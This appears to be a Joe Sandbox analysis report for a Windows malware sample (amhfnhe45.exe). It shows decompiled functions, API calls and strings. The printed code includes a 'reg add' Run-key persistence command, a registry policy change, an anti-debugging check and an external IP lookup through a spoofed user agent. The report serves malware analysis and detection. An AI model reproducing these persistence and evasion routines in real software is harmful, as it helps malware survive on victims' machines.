					_push(0);
					_push( &_v268);
					_push(0);
					_push(0x20019);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v136);
					_push(0x80000001); // executed
				} else {
					E00425A6E( &_v264, 0x80, "S-1-5-18\\");
					E00425D48( &_v264, 0x80,  &_v136);
					_push(0);
					_push( &_v268);
					_push(0);
					_push(0x20019);
					_push(0);
					_push(0);
					_push(0);
					_push( &_v264);
					_push(0x80000003);
				}
				RegCreateKeyExA(); // executed
				_t35 = RegQueryValueExA(_v268, "data", 0,  &_v276, "149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg",  &_v272); // executed
				RegCloseKey(_v268);
				_t64 = _t62;
				if(_t35 == 0) {
					return E004256FE(0 | _v272 == 0x00000100, _t46, _v8 ^ _t66,  &_v276, _t61, _t64);
				} else {
					return E004256FE(0, _t46, _v8 ^ _t66,  &_v276, _t61, _t64);
				}
			}

APIs

RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020019,00000000,?,00000000), ref: 004011B9
RegQueryValueExA.KERNEL32(?,data,00000000,?,149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg,00000100), ref: 004011E1
RegCloseKey.ADVAPI32(?), ref: 004011F0

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

data, xrefs: 004011DB
oH4v~@4v, xrefs: 004011E1
AA6A331C729CA1F, xrefs: 00401114
S-1-5-18\, xrefs: 00401142
149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg, xrefs: 0040110A, 004011CD
Software\%S, xrefs: 0040111F

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041FD80, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71

C-Code - Quality: 96%

			E0041FD80(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v8202;
				char _v8204;
				void* _v8208;
				char _v8212;
				signed int _t17;
				void* _t31;
				signed int _t45;

				E0042E220(0x2010);
				_t17 =  *0x43f054; // 0xd6baf341
				_v8 = _t17 ^ _t45;
				_v8204 = 0;
				E0042D0A0( &_v8202, 0, 0x1ffe);
				_v8212 = 1;
				RegCreateKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", 0, 0, 0, 0x20006, 0,  &_v8208, 0); // executed
				RegSetValueExW(_v8208, L"EnableLinkedConnections", 0, 4,  &_v8212, 4); // executed
				RegFlushKey(_v8208);
				RegCloseKey(_v8208);
				E00425ACD( &_v8204, 0x1000, L"reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v game342 /t REG_SZ  /d \"");
				E00425ACD( &_v8204, 0x1000, "C:\Users\admin\AppData\Roaming\amhfnhe45.exe");
				E00425ACD( &_v8204, 0x1000, L"\" /f");
				_t31 = E0041EEE0( &_v8204); // executed
				return E004256FE(_t31, __ebx, _v8 ^ _t45,  &_v8204, __edi, __esi);
			}

0x0041fd8a
0x0041fd8f
0x0041fd96
0x0041fda8
0x0041fdaf
0x0041fdd7
0x0041fde1
0x0041fe00
0x0041fe0d
0x0041fe1a
0x0041fe31
0x0041fe4a
0x0041fe63
0x0041fe72
0x0041fe87

APIs

RegCreateKeyExA.KERNEL32 ref: 0041FDE1
RegSetValueExW.KERNEL32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
RegFlushKey.ADVAPI32(?), ref: 0041FE0D
RegCloseKey.ADVAPI32(?), ref: 0041FE1A

Part of subcall function 0041EEE0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 0041EF4A
Part of subcall function 0041EEE0: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041EF55
Part of subcall function 0041EEE0: CloseHandle.KERNEL32(?), ref: 0041EF65
Part of subcall function 0041EEE0: CloseHandle.KERNEL32(?), ref: 0041EF6B
Part of subcall function 0041EEE0: Sleep.KERNELBASE(000003E8), ref: 0041EF72

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

C:\Users\admin\AppData\Roaming\amhfnhe45.exe, xrefs: 0041FE39
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v game342 /t REG_SZ /d ", xrefs: 0041FE20
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 0041FDCD
" /f, xrefs: 0041FE52
EnableLinkedConnections, xrefs: 0041FDFA

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 00401000, Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 53

C-Code - Quality: 100%

			E00401000(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v262;
				short _v264;
				void* _v268;
				signed int _t11;
				void* _t34;
				signed int _t37;

				_t35 = _t37;
				_t11 =  *0x43f054; // 0xd6baf341
				_v8 = _t11 ^ _t37;
				_v264 = 0;
				E0042D0A0( &_v262, 0, 0xfe);
				E00401CB0(0x80,  &_v264, L"Software\\%s", "AA6A331C729CA1F");
				RegCreateKeyExW(0x80000001,  &_v264, 0, 0, 0, 0x20006, 0,  &_v268, 0); // executed
				RegSetValueExW(_v268, L"data", 0, 3, "149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg", 0x100); // executed
				RegFlushKey(_v268);
				return E004256FE(RegCloseKey(_v268), __ebx, _v8 ^ _t35, _v268, __edi, __esi, _t34);
			}

0x00401003
0x0040100b
0x00401012
0x00401024
0x0040102b
0x00401046
0x00401070
0x00401090
0x0040109d
0x004010bd

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 00401070
RegSetValueExW.KERNEL32(?,data,00000000,00000003,149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg,00000100), ref: 00401090
RegFlushKey.ADVAPI32(?), ref: 0040109D
RegCloseKey.ADVAPI32(?), ref: 004010AA

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Software\%s, xrefs: 0040103B
~@4v, xrefs: 00401070
data, xrefs: 0040108A
AA6A331C729CA1F, xrefs: 00401030
149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg, xrefs: 00401081

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041BA30, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 74

C-Code - Quality: 74%

			E0041BA30(void* __ebx, void* __edx) {
				signed int _v8;
				char _v1031;
				char _v1032;
				char _v1036;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t16;
				void* _t17;
				char* _t20;
				int _t23;
				int _t25;
				void* _t34;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t42;
				void* _t44;
				void* _t45;
				signed int _t47;
				signed int _t50;

				_t34 = __edx;
				_t27 = __ebx;
				_t47 = _t50;
				_t12 =  *0x43f054; // 0xd6baf341
				_v8 = _t12 ^ _t47;
				_v1032 = 0;
				E0042D0A0( &_v1031, 0, 0x3ff);
				_t16 = InternetOpenA("Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko", 4, 0, 0, 0); // executed
				_t38 = _t16;
				_t17 = InternetOpenUrlW(_t38, L"http://ip.tyk.nu/", 0, 0, 0x40000000, 0); // executed
				_t42 = _t17;
				if(_t42 != 0) {
					E0041BB40( &_v1032, 0xc8, _t42,  &_v1036); // executed
					_t20 = _t47 + _v1036 - 0x405;
					if( *_t20 == 0xa) {
						 *_t20 = 0;
					}
					E00425A6E("77.247.181.162", 0x13,  &_v1032);
					InternetCloseHandle(_t42); // executed
					_t23 = InternetCloseHandle(_t38);
					_pop(_t39);
					_pop(_t44);
					return E004256FE(_t23, _t27, _v8 ^ _t47,  &_v1032, _t39, _t44);
				} else {
					_t25 = InternetCloseHandle(_t38);
					_pop(_t40);
					_pop(_t45);
					return E004256FE(_t25, __ebx, _v8 ^ _t47, _t34, _t40, _t45);
				}
			}

0x0041ba30
0x0041ba30
0x0041ba33
0x0041ba3b
0x0041ba42
0x0041ba55
0x0041ba5c
0x0041ba71
0x0041ba82
0x0041ba8a
0x0041ba90
0x0041ba94
0x0041bac0
0x0041bacb
0x0041bad8
0x0041bada
0x0041bada
0x0041baeb
0x0041bafa
0x0041bafd
0x0041bb02
0x0041bb05
0x0041bb0e
0x0041ba96
0x0041ba97
0x0041ba9d
0x0041ba9e
0x0041baac
0x0041baac

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko,00000004,00000000,00000000,00000000), ref: 0041BA71
InternetOpenUrlW.WININET(00000000,http://ip.tyk.nu/,00000000,00000000,40000000,00000000), ref: 0041BA8A
InternetCloseHandle.WININET(00000000), ref: 0041BA97

Part of subcall function 0041BB40: InternetReadFile.WININET(?,?,?,?,00000000,00000000), ref: 0041BC50

InternetCloseHandle.WININET(00000000), ref: 0041BAFA
InternetCloseHandle.WININET(00000000), ref: 0041BAFD

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko, xrefs: 0041BA6C
http://ip.tyk.nu/, xrefs: 0041BA84
77.247.181.162, xrefs: 0041BAE6

Memory Dump Source

Source File: 00000001.00000002.1397105690.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_amhfnhe45.jbxd

Function 004271E2, Relevance: 13.0, APIs: 3, Strings: 4, Instructions: 741

C-Code - Quality: 63%

			E004271E2(signed int __edx, signed int _a4, signed int _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				char _v16;
				char _v17;
				signed char _v528;
				signed int _v532;
				signed int _v533;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed char _v559;
				char _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				char _v596;
				signed int _v600;
				char _v608;
				signed int _v612;
				signed int _v616;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				signed int _t339;
				signed int _t344;
				signed int _t345;
				signed int _t347;
				signed int _t349;
				signed int _t351;
				signed int _t352;
				signed int _t355;
				signed int _t356;
				void* _t361;
				signed int _t366;
				void* _t367;
				signed int _t369;
				signed int _t375;
				signed int _t377;
				void* _t378;
				signed int _t381;
				signed int _t382;
				void* _t383;
				signed int _t389;

				_t375 = __edx;
				_t387 = _t389;
				_t339 =  *0x43f054; // 0xd6baf341
				_v8 = _t339 ^ _t389;
				_t381 = _a4;
				_t377 = _a8;
				_v580 = _t381;
				_v556 = _a16;
				_v588 = 0;
				_v532 = 0;
				_v568 = 0;
				_v540 = 0;
				_v564 = 0;
				_v584 = 0;
				_v572 = 0;
				E00425F24( &_v608, _t377, _a12);
				_t392 = _t381;
				if(_t381 != 0) {
					__eflags =  *(_t381 + 0xc) & 0x00000040;
					if(( *(_t381 + 0xc) & 0x00000040) != 0) {
						L16:
						_t382 = 0;
						__eflags = _t377;
						if(__eflags == 0) {
							goto L2;
						}
						_t375 =  *_t377;
						_t366 = 0;
						_v552 = 0;
						_v548 = 0;
						_v592 = 0;
						_v533 = _t375;
						__eflags = _t375;
						if(_t375 == 0) {
							L231:
							__eflags = _v596;
							if(_v596 != 0) {
								_t347 = _v600;
								_t335 = _t347 + 0x70;
								 *_t335 =  *(_t347 + 0x70) & 0xfffffffd;
								__eflags =  *_t335;
							}
							_t345 = _v552;
							goto L234;
						} else {
							goto L18;
						}
						while(1) {
							L18:
							_v576 = _t377 + 1;
							__eflags = _v552 - _t382;
							if(_v552 < _t382) {
								goto L231;
							} else {
								_t39 = _t375 - 0x20; // 0x5ffffe6
								__eflags = _t39 - 0x58;
								if(_t39 > 0x58) {
									_t349 = 0;
									__eflags = 0;
								} else {
									_t349 =  *(_t375 + 0x431328) & 0x0000000f;
								}
							}
							_t42 = _t349 * 8; // 0x6000006
							_t351 =  *(_t366 + _t42 + 0x431348) >> 4;
							_t367 = 7;
							_v612 = _t351;
							__eflags = _t351 - _t367;
							if(_t351 > _t367) {
								L229:
								_t377 = _v576;
								_t352 =  *_t377;
								_v533 = _t352;
								__eflags = _t352;
								if(_t352 == 0) {
									goto L231;
								}
								_t366 = _v612;
								_t382 = 0;
								_t375 = _t352;
								continue;
							}
							switch( *((intOrPtr*)(_t351 * 4 +  &M00427D6E))) {
								case 0:
									L66:
									_v572 = _v572 & 0x00000000;
									 &_v608 = __dl & 0x000000ff;
									__eax = E0042D3FD(__dl & 0x000000ff,  &_v608);
									_pop(__ecx);
									__eflags = __eax;
									__al = _v533;
									_pop(__ecx);
									if(__eax == 0) {
										L68:
										__ecx = _v580;
										__esi =  &_v552;
										__eax = E00427D8E(__eax, __ecx, __esi);
										goto L229;
									}
									__ecx = _v580;
									__esi =  &_v552;
									__eax = E00427D8E(__eax, __ecx, __esi);
									__al =  *__edi;
									__edi = __edi + 1;
									_v576 = __edi;
									__eflags = __al;
									if(__eflags == 0) {
										goto L2;
									}
									goto L68;
								case 1:
									_v540 = _v540 | 0xffffffff;
									_v624 = _t382;
									_v584 = _t382;
									_v568 = _t382;
									_v564 = _t382;
									_v532 = _t382;
									_v572 = _t382;
									goto L229;
								case 2:
									__eax = __dl;
									__eax = __dl - 0x20;
									__eflags = __eax;
									if(__eax == 0) {
										_v532 = _v532 | 0x00000002;
									} else {
										__eax = __eax - 3;
										__eflags = __eax;
										if(__eax == 0) {
											_v532 = _v532 | 0x00000080;
										} else {
											__eax = __eax - 8;
											__eflags = __eax;
											if(__eax == 0) {
												_v532 = _v532 | 0x00000001;
											} else {
												__eax = __eax - 1;
												__eax = __eax - 1;
												__eflags = __eax;
												if(__eax == 0) {
													_v532 = _v532 | 0x00000004;
												} else {
													__eax = __eax - 3;
													__eflags = __eax;
													if(__eax == 0) {
														_v532 = _v532 | 0x00000008;
													}
												}
											}
										}
									}
									goto L229;
								case 3:
									__eflags = __dl - 0x2a;
									if(__dl != 0x2a) {
										_v568 = _v568 * 0xa;
										__ecx = __dl;
										__eax = _v568 * 0xa + __ecx - 0x30;
										_v568 = __eax;
									} else {
										__ebx = __ebx + 4;
										_v556 = __ebx;
										_t66 = __ebx - 4; // 0x0
										__ebx =  *_t66;
										_v568 = __ebx;
										__eflags = __ebx - __esi;
										if(__ebx < __esi) {
											_v532 = _v532 | 0x00000004;
											_v568 =  ~_v568;
										}
									}
									goto L229;
								case 4:
									_v540 = __esi;
									goto L229;
								case 5:
									__eflags = __dl - 0x2a;
									if(__dl != 0x2a) {
										_v540 = _v540 * 0xa;
										__ecx = __dl;
										__eax = _v540 * 0xa + __ecx - 0x30;
										_v540 = __eax;
									} else {
										__ebx = __ebx + 4;
										_v556 = __ebx;
										__ebx =  *(__ebx - 4);
										_v540 = __ebx;
										__eflags = __ebx - __esi;
										if(__ebx < __esi) {
											_v540 = _v540 | 0xffffffff;
										}
									}
									goto L229;
								case 6:
									__eflags = __dl - 0x49;
									if(__dl == 0x49) {
										__al =  *__edi;
										__eflags = __al - 0x36;
										if(__al != 0x36) {
											L56:
											__eflags = __al - 0x33;
											if(__al != 0x33) {
												L59:
												__eflags = __al - 0x64;
												if(__al == 0x64) {
													goto L229;
												}
												__eflags = __al - 0x69;
												if(__al == 0x69) {
													goto L229;
												}
												__eflags = __al - 0x6f;
												if(__al == 0x6f) {
													goto L229;
												}
												__eflags = __al - 0x75;
												if(__al == 0x75) {
													goto L229;
												}
												__eflags = __al - 0x78;
												if(__al == 0x78) {
													goto L229;
												}
												__eflags = __al - 0x58;
												if(__al == 0x58) {
													goto L229;
												}
												_v612 = __esi;
												goto L66;
											}
											__eflags =  *(__edi + 1) - 0x32;
											if( *(__edi + 1) != 0x32) {
												goto L59;
											}
											__edi = __edi + 2;
											_v532 = _v532 & 0xffff7fff;
											_v576 = __edi;
											goto L229;
										}
										__eflags =  *(__edi + 1) - 0x34;
										if( *(__edi + 1) != 0x34) {
											goto L56;
										}
										__edi = __edi + 2;
										_v532 = _v532 | 0x00008000;
										_v576 = __edi;
									} else {
										__eflags = __dl - 0x68;
										if(__dl == 0x68) {
											_v532 = _v532 | 0x00000020;
										} else {
											__eflags = __dl - 0x6c;
											if(__dl == 0x6c) {
												__eflags =  *__edi - 0x6c;
												if( *__edi != 0x6c) {
													_v532 = _v532 | 0x00000010;
												} else {
													__edi = __edi + 1;
													_v532 = _v532 | 0x00001000;
													_v576 = __edi;
												}
											} else {
												__eflags = __dl - 0x77;
												if(__dl == 0x77) {
													_v532 = _v532 | 0x00000800;
												}
											}
										}
									}
									goto L229;
								case 7:
									__eax = __dl;
									__eflags = __eax - 0x64;
									if(__eflags > 0) {
										__eflags = __eax - 0x70;
										if(__eflags > 0) {
											__eax = __eax - 0x73;
											__eflags = __eax;
											if(__eax == 0) {
												L84:
												__ecx = _v540;
												__eflags = __ecx - 0xffffffff;
												if(__ecx == 0xffffffff) {
													__ecx = 0x7fffffff;
												}
												__ebx = __ebx + 4;
												__eflags = _v532 & 0x00000810;
												_v556 = __ebx;
												__ebx =  *(__ebx - 4);
												_v544 = __ebx;
												if((_v532 & 0x00000810) == 0) {
													__eflags = __ebx - __esi;
													if(__ebx == __esi) {
														__eax =  *0x43f1d0; // 0x43133c
														_v544 = __eax;
													}
													__eax = _v544;
													while(1) {
														__eflags = __ecx - __esi;
														if(__ecx == __esi) {
															break;
														}
														__ecx = __ecx - 1;
														__eflags =  *__eax;
														if( *__eax == 0) {
															break;
														}
														__eax = __eax + 1;
														__eflags = __eax;
													}
													__eax = __eax - _v544;
													__eflags = __eax;
													goto L194;
												} else {
													__eflags = __ebx - __esi;
													if(__ebx == __esi) {
														__eax =  *0x43f1d4; // 0x43132c
														_v544 = __eax;
													}
													__eax = _v544;
													_v572 = 1;
													while(1) {
														__eflags = __ecx - __esi;
														if(__ecx == __esi) {
															break;
														}
														__ecx = __ecx - 1;
														__eflags =  *__eax - __si;
														if( *__eax == __si) {
															break;
														}
														__eax = __eax + 2;
														__eflags = __eax;
													}
													__eax = __eax - _v544;
													__eax = __eax >> 1;
													L194:
													_v548 = __eax;
													L195:
													__eflags = _v584;
													if(_v584 != 0) {
														L227:
														__eflags = _v592;
														if(_v592 != 0) {
															__eax = E004258E3(_v592);
															_t327 =  &_v592;
															 *_t327 = _v592 & 0x00000000;
															__eflags =  *_t327;
														}
														goto L229;
													}
													__eax = _v532;
													__eflags = __al & 0x00000040;
													if((__al & 0x00000040) == 0) {
														L204:
														_v568 = _v568 - _v548;
														__ebx = _v568 - _v548 - _v564;
														_v616 = __ebx;
														__eflags = __al & 0x0000000c;
														if(__eflags != 0) {
															L208:
															__edi = _v580;
															__ecx = _v564;
															__eax =  &_v560;
															__eax =  &_v552;
															__eax = E0042716E( &_v552, _v564, __edi, __eflags,  &_v560);
															__eflags = _v532 & 0x00000008;
															if((_v532 & 0x00000008) == 0) {
																L213:
																__eflags = _v572;
																__ebx = _v548;
																if(__eflags == 0) {
																	L221:
																	__eax =  &_v552;
																	__ecx = __ebx; // executed
																	__eax = E0042716E( &_v552, __ebx, __edi, __eflags, _v544); // executed
																	L222:
																	__eflags = _v552;
																	if(_v552 < 0) {
																		goto L227;
																	}
																	__eflags = _v532 & 0x00000004;
																	if((_v532 & 0x00000004) == 0) {
																		goto L227;
																	}
																	__ebx = _v616;
																	while(1) {
																		__eflags = __ebx;
																		if(__ebx <= 0) {
																			goto L227;
																		}
																		__esi =  &_v552;
																		__ecx = __edi;
																		__al = 0x20;
																		__ebx = __ebx - 1;
																		__eax = E00427D8E(__eax, __ecx, __esi);
																		__eflags = _v552 - 0xffffffff;
																		if(_v552 == 0xffffffff) {
																			goto L227;
																		}
																	}
																	goto L227;
																}
																__eflags = __ebx;
																if(__eflags <= 0) {
																	goto L221;
																}
																__esi = _v544;
																while(1) {
																	 *__esi & 0x0000ffff =  &_v16;
																	__eax =  &_v628;
																	__ebx = __ebx - 1;
																	__esi = __esi + 2;
																	__eax = E0042D3E0( &_v628,  &_v16, 6,  *__esi & 0x0000ffff);
																	__eflags = __eax;
																	if(__eax != 0) {
																		break;
																	}
																	__ecx = _v628;
																	__eflags = __ecx;
																	if(__eflags == 0) {
																		break;
																	}
																	__eax =  &_v16;
																	__eax =  &_v552;
																	__eax = E0042716E( &_v552, __ecx, __edi, __eflags,  &_v16);
																	__eflags = __ebx;
																	if(__ebx != 0) {
																		continue;
																	}
																	goto L222;
																}
																_v552 = _v552 | 0xffffffff;
																goto L222;
															}
															__eflags = _v532 & 0x00000004;
															if((_v532 & 0x00000004) != 0) {
																goto L213;
															}
															while(1) {
																__eflags = __ebx;
																if(__ebx <= 0) {
																	goto L213;
																}
																__esi =  &_v552;
																__ecx = __edi;
																__al = 0x30;
																__ebx = __ebx - 1;
																__eax = E00427D8E(__eax, __ecx, __esi);
																__eflags = _v552 - 0xffffffff;
																if(_v552 == 0xffffffff) {
																	goto L213;
																}
															}
															goto L213;
														}
														__edi = __ebx;
														__eflags = __ebx;
														if(__eflags <= 0) {
															goto L208;
														} else {
															goto L206;
														}
														while(1) {
															L206:
															__ecx = _v580;
															__esi =  &_v552;
															__al = 0x20;
															__edi = __edi - 1;
															__eax = E00427D8E(__eax, _v580, __esi);
															__eflags = _v552 - 0xffffffff;
															if(__eflags == 0) {
																goto L208;
															}
															__eflags = __edi;
															if(__eflags > 0) {
																continue;
															}
															goto L208;
														}
														goto L208;
													}
													__eflags = __eax & 0x00000100;
													if((__eax & 0x00000100) == 0) {
														__eflags = __al & 0x00000001;
														if((__al & 0x00000001) == 0) {
															__eflags = __al & 0x00000002;
															if((__al & 0x00000002) == 0) {
																goto L204;
															}
															_v560 = 0x20;
															L203:
															_v564 = 1;
															goto L204;
														}
														_v560 = 0x2b;
														goto L203;
													}
													_v560 = 0x2d;
													goto L203;
												}
											}
											__eax = __eax - 1;
											__eax = __eax - 1;
											__eflags = __eax;
											if(__eax == 0) {
												L121:
												_v548 = 0xa;
												L122:
												__ecx = _v532;
												__eflags = __ecx & 0x00008000;
												if((__ecx & 0x00008000) == 0) {
													__eflags = __ecx & 0x00001000;
													if((__ecx & 0x00001000) != 0) {
														goto L123;
													}
													__ebx = __ebx + 4;
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														__eax =  *(__ebx - 4);
														__eflags = __cl & 0x00000040;
														if((__cl & 0x00000040) == 0) {
															__edx = 0;
															__eflags = 0;
														} else {
															asm("cdq");
														}
														L159:
														_v556 = __ebx;
														L160:
														__eflags = __cl & 0x00000040;
														if((__cl & 0x00000040) == 0) {
															L165:
															__eflags = _v532 & 0x00009000;
															__ebx = __edx;
															__edi = __eax;
															if((_v532 & 0x00009000) == 0) {
																__ebx = 0;
																__eflags = 0;
															}
															__eflags = _v540;
															if(_v540 >= 0) {
																_v532 = _v532 & 0xfffffff7;
																__eax = 0x200;
																__eflags = _v540 - 0x200;
																if(_v540 > 0x200) {
																	_v540 = 0x200;
																}
															} else {
																_v540 = 1;
															}
															__eax = __edi;
															__eax = __edi | __ebx;
															__eflags = __eax;
															if(__eax == 0) {
																_t248 =  &_v564;
																 *_t248 = _v564 & __eax;
																__eflags =  *_t248;
															}
															__esi =  &_v17;
															while(1) {
																__eax = _v540;
																_v540 = _v540 - 1;
																__eflags = _v540;
																if(_v540 > 0) {
																	goto L176;
																}
																L175:
																__edi = __edi | __ebx;
																__eflags = __edi | __ebx;
																if((__edi | __ebx) == 0) {
																	__eax =  &_v17;
																	__eax =  &_v17 - __esi;
																	__esi = __esi + 1;
																	__eflags = _v532 & 0x00000200;
																	_v548 = __eax;
																	_v544 = __esi;
																	if((_v532 & 0x00000200) == 0) {
																		goto L195;
																	}
																	__eflags = __eax;
																	if(__eax == 0) {
																		L182:
																		_v544 = _v544 - 1;
																		__ecx = _v544;
																		 *__ecx = 0x30;
																		__eax = __eax + 1;
																		goto L194;
																	}
																	__ecx = __esi;
																	__eflags =  *__ecx - 0x30;
																	if( *__ecx == 0x30) {
																		goto L195;
																	}
																	goto L182;
																}
																L176:
																__eax = _v548;
																asm("cdq");
																__eax = E0042D450(__edi, __ebx, _v548, __edx);
																__ecx = __ecx + 0x30;
																_v616 = __ebx;
																__edi = __eax;
																__ebx = __edx;
																__eflags = __ecx - 0x39;
																if(__ecx > 0x39) {
																	__ecx = __ecx + _v588;
																	__eflags = __ecx;
																}
																 *__esi = __cl;
																__esi = __esi - 1;
																__eax = _v540;
																_v540 = _v540 - 1;
																__eflags = _v540;
																if(_v540 > 0) {
																	goto L176;
																}
																goto L175;
															}
														}
														__eflags = __edx;
														if(__eflags > 0) {
															goto L165;
														}
														if(__eflags < 0) {
															L164:
															__eax =  ~__eax;
															asm("adc edx, 0x0");
															__edx =  ~__edx;
															_t237 =  &_v532;
															 *_t237 = _v532 | 0x00000100;
															__eflags =  *_t237;
															goto L165;
														}
														__eflags = __eax;
														if(__eax >= 0) {
															goto L165;
														}
														goto L164;
													}
													_v556 = __ebx;
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														__eax =  *(__ebx - 4) & 0x0000ffff;
													} else {
														__eax =  *(__ebx - 4);
													}
													asm("cdq");
													goto L160;
												}
												L123:
												__eax =  *__ebx;
												__edx =  *(__ebx + 4);
												__ebx = __ebx + 8;
												goto L159;
											}
											__eax = __eax - 3;
											__eflags = __eax;
											if(__eax != 0) {
												goto L195;
											}
											_v588 = 0x27;
											L148:
											__eflags = _v532 & 0x00000080;
											_v548 = 0x10;
											if((_v532 & 0x00000080) != 0) {
												__al = _v588;
												__al = _v588 + 0x51;
												_v560 = 0x30;
												_v559 = __al;
												_v564 = 2;
											}
											goto L122;
										}
										if(__eflags == 0) {
											_v540 = 8;
											L143:
											_v588 = __ecx;
											goto L148;
										}
										__eflags = __eax - 0x65;
										if(__eax < 0x65) {
											goto L195;
										}
										__eflags = __eax - 0x67;
										if(__eax <= 0x67) {
											L78:
											_v532 = _v532 | 0x00000040;
											__edi =  &_v528;
											__eax = 0x200;
											_v544 = __edi;
											_v616 = 0x200;
											__eflags = _v540 - __esi;
											if(__eflags >= 0) {
												if(__eflags != 0) {
													__eflags = _v540 - 0x200;
													if(_v540 > 0x200) {
														_v540 = 0x200;
													}
													__eflags = _v540 - 0xa3;
													if(_v540 > 0xa3) {
														__esi = _v540;
														__esi = _v540 + 0x15d;
														__eax = E0042D11A(__esi);
														__dl = _v533;
														_v592 = __eax;
														__eflags = __eax;
														if(__eax == 0) {
															_v540 = 0xa3;
														} else {
															_v544 = __eax;
															_v616 = __esi;
															__edi = __eax;
														}
													}
												} else {
													__eflags = __dl - 0x67;
													if(__dl == 0x67) {
														_v540 = 1;
													}
												}
											} else {
												_v540 = 6;
											}
											__eax =  *__ebx;
											__esi = __imp__DecodePointer;
											__ebx = __ebx + 8;
											_v636 = __eax;
											__eax =  *(__ebx - 4);
											_v632 =  *(__ebx - 4);
											__eax =  &_v608;
											_push( &_v608);
											_push(_v624);
											__eax = __dl;
											_push(_v540);
											_v556 = __ebx;
											_push(__dl);
											_push(_v616);
											__eax =  &_v636;
											_push(__edi);
											_push( &_v636);
											_push( *0x43fd68);
											 *__esi() = _v636();
											__ebx = _v532;
											__esp = __esp + 0x1c;
											__ebx = _v532 & 0x00000080;
											__eflags = __ebx;
											if(__ebx != 0) {
												__eflags = _v540;
												if(_v540 == 0) {
													__eax =  &_v608;
													_push( &_v608);
													_push(__edi);
													_push( *0x43fd74);
													 *__esi() = _v608();
													_pop(__ecx);
													_pop(__ecx);
												}
											}
											__eflags = _v533 - 0x67;
											if(_v533 == 0x67) {
												__eflags = __ebx;
